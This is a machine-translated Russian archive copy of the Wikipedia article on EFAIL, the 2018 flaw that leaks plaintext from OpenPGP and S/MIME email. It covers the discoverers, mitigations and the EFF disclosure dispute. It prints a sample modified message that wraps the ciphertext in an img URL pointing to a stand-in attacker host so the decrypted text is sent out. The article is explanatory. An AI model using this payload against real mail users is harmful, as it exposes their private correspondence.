Jump to content

ЭФАЙЛ

Логотип команды, анонсировавшей уязвимость, метафорически представляющий собой открытый текст, вытекающий из зашифрованного «конверта».

Efail , также пишется как EFAIL , представляет собой дыру в безопасности в системах электронной почты , с помощью которой контент может передаваться в зашифрованном виде. Этот пробел позволяет злоумышленникам получить доступ к расшифрованному содержимому электронного письма, если оно содержит активный контент, такой как HTML. [1] или JavaScript , или если в клиенте включена загрузка внешнего контента. Затронутые почтовые клиенты включают Gmail , Apple Mail и Microsoft Outlook . [1]

Два связанных идентификатора общих уязвимостей и рисков , CVE версии 2017-17688 и CVE- 2017-17689 Выпущены . Брешь в безопасности была обнародована 13 мая 2018 года Дамианом Поддебняком, Кристианом Дрезеном, Йенсом Мюллером, Фабианом Изингом, Себастьяном Шинцелем, Саймоном Фридбергером, Юрай Соморовски и Йоргом Швенком в рамках выступления на 27-м симпозиуме USENIX по безопасности, Балтимор, август 2018 года. .

В результате уязвимости содержимое атакованного зашифрованного электронного письма может быть передано злоумышленнику в виде обычного текста с помощью уязвимого почтового клиента. Используемые ключи шифрования не разглашаются.

Описание

[ редактировать ]

Брешь в безопасности касается многих распространенных почтовых программ, когда они используются с шифрования электронной почты системами OpenPGP и S/MIME . Злоумышленнику необходим доступ к атакованному сообщению электронной почты в зашифрованном виде, а также возможность отправить электронное письмо хотя бы одному регулярному получателю этого исходного электронного письма. Чтобы воспользоваться брешью в безопасности, злоумышленник модифицирует зашифрованное электронное письмо, в результате чего программа электронной почты получателя отправляет злоумышленнику расшифрованное содержимое электронного письма.

Чтобы получить доступ к расшифрованному содержимому зашифрованного электронного письма, злоумышленник изменяет атакуемое электронное письмо, чтобы оно содержало текст, подготовленный злоумышленником определенным образом. Затем злоумышленник отправляет измененное электронное письмо одному из обычных получателей.

Злоумышленник вставляет дополнительный текст до и после зашифрованного текста в зашифрованное электронное письмо, тем самым изменяя сообщение так, что создается составное/смешанное сообщение (MIME), и зашифрованная часть сообщения появляется вместе с ограничительными метками сообщения MIME как значение параметра HTML-тега.

Пример модифицированного письма S/MIME:

[...]Content-Type: multipart/mixed;boundary="BOUNDARY"[...]--BOUNDARYContent-Type: text/html<img src="http://attacker.chosen.url/--BOUNDARYContent-Type: application/pkcs7-mime;  s-mime-typed-envelope-dataContent-Transfer-Encoding: base64ENCRYPTEDMESSAGEENCRYPTEDMESSAGEENCRYPTEDMESSAGEENCRYPTEDMESSAGE--BOUNDARYContent-Type: text/html">--BOUNDARY...

Почтовый клиент сначала разбивает составное сообщение на отдельные части, используя --BOUNDARY тег, а затем расшифровывает зашифрованные части. Затем он заново собирает составное сообщение и получает сообщение следующим образом:

[...]Content-Type: multipart/mixed;boundary="BOUNDARY"[...]--BOUNDARYContent-Type: text/html<img src="http://attacker.chosen.url/SECRETMESSAGESECRETMESSAGE">--BOUNDARY...

Это сообщение теперь содержит расшифрованное содержимое электронного письма в формате src= атрибут <img> тег и передается программой электронной почты как URL-адрес на веб-сервер. attacker.chosen.url контролируется злоумышленником, когда этот контент запрашивается. Теперь злоумышленник может получить содержимое зашифрованного сообщения из журналов своего веб-сервера.

В варианте атаки злоумышленник использует уязвимость в режимах работы CBC (S/MIME) и CFB (OpenPGP) используемых алгоритмов шифрования. Это позволяет ему изменять зашифрованный текст, вставляя гаджеты . Побочным эффектом этой манипуляции является то, что исходный открытый текст становится неразборчивым. Если это было известно, злоумышленник может это исправить, вставив дополнительные гаджеты. Злоумышленник может скрыть неизвестный простой текст, вставив определенные HTML-теги . В результате получается сообщение, структура которого аналогична описанной выше.

Смягчения

[ редактировать ]

Поскольку уязвимость направлена ​​против содержимого электронного письма, а не против получателя, необходимо, чтобы все получатели реализовали контрмеры. К ним относятся:

  • Отключите активное содержимое, такое как HTML или JavaScript, при просмотре электронных писем.
  • Подавить автоматическую перезагрузку внешнего контента, например изображений.

В какой степени даже отправители зашифрованного контента могут снизить уязвимость, например, с помощью электронных подписей или ограничения подмножеством форматов MIME, еще окончательно не выяснено.

Объявляя об уязвимости безопасности 13 мая 2018 года, Electronic Frontier Foundation (EFF) рекомендовала прекратить использование любых плагинов PGP в почтовых программах, даже несмотря на то, что уязвимость напрямую связана не с PGP, а с конфигурацией почтовой программы. [2] [3] Скоординированная публикация изначально была запланирована на 15 мая. EFF подвергся критике за игнорирование этого со стороны различных партий. [4] [5] [6] [7] [8]

Вследствие этого Роберт Хансен рекомендовал создать закрытую группу или список рассылки, чтобы лучше координировать публикацию будущих проблем безопасности. Тем не менее, он считал EFF и его директора Дэнни О'Брайена лучшей организацией для управления такой «группой раскрытия информации OpenPGP». [9]

  1. ^ Перейти обратно: а б «Дефекты Efail десятилетней давности могут привести к утечке открытого текста электронных писем, зашифрованных с помощью PGP и S/MIME» . arstechnica.com . 14 мая 2018 г.
  2. ^ «EFF в Твиттере» . Твиттер . Фонд электронных границ (EFF). 13 мая 2018 г. Проверено 17 мая 2018 г. Чтобы защитить себя, EFF настоятельно рекомендует вам на данный момент удалить или отключить плагин электронной почты PGP.
  3. ^ О'Брайен, Дэнни ; Гебхарт, Джинни (13 мая 2018 г.), Внимание пользователей PGP: новые уязвимости требуют принятия мер немедленно , Electronic Frontier Foundation (EFF) , получено 17 мая 2018 г.
  4. ^ «Комментарий: Efail — это EFFail» . heise онлайн (на немецком языке). 16 мая 2018 г. Проверено 17 мая 2018 г.
  5. ^ «Главный разработчик Enigmail дал интервью: выпуск Efail был «опрометчивым» » . Heise Security (на немецком языке). 15 мая 2018 г. Проверено 17 мая 2018 г.
  6. ^ Кох, Вернер (14 мая 2018 г.). «Efail или OpenPGP безопаснее, чем S/MIME» . gnupg-пользователи . Проверено 17 мая 2018 г.
  7. ^ Грин, Мэтью (17 мая 2018 г.). «Было ли раскрытие информации об Efail ужасно провальным?» . Несколько мыслей о криптографической инженерии . Проверено 17 мая 2018 г.
  8. ^ «Хештег #EFFail в Твиттере» (на немецком языке) . Проверено 17 мая 2018 г.
  9. ^ Хансен, Роберт (20 мая 2018 г.). «Эфаил: Посмертие» . Medium.com . Проверено 21 мая 2018 г.

Дальнейшее чтение

[ редактировать ]
[ редактировать ]
Arc.Ask3.Ru: конец переведенного документа.
Arc.Ask3.Ru
Номер скриншота №: 7b4cc2e4f84b24f2ecd59127c387d4a1__1700306400
URL1:https://arc.ask3.ru/arc/aa/7b/a1/7b4cc2e4f84b24f2ecd59127c387d4a1.html
Заголовок, (Title) документа по адресу, URL1:
EFAIL - Wikipedia
Данный printscreen веб страницы (снимок веб страницы, скриншот веб страницы), визуально-программная копия документа расположенного по адресу URL1 и сохраненная в файл, имеет: квалифицированную, усовершенствованную (подтверждены: метки времени, валидность сертификата), открепленную ЭЦП (приложена к данному файлу), что может быть использовано для подтверждения содержания и факта существования документа в этот момент времени. Права на данный скриншот принадлежат администрации Ask3.ru, использование в качестве доказательства только с письменного разрешения правообладателя скриншота. Администрация Ask3.ru не несет ответственности за информацию размещенную на данном скриншоте. Права на прочие зарегистрированные элементы любого права, изображенные на снимках принадлежат их владельцам. Качество перевода предоставляется как есть. Любые претензии, иски не могут быть предъявлены. Если вы не согласны с любым пунктом перечисленным выше, вы не можете использовать данный сайт и информация размещенную на нем (сайте/странице), немедленно покиньте данный сайт. В случае нарушения любого пункта перечисленного выше, штраф 55! (Пятьдесят пять факториал, Денежную единицу (имеющую самостоятельную стоимость) можете выбрать самостоятельно, выплаичвается товарами в течение 7 дней с момента нарушения.)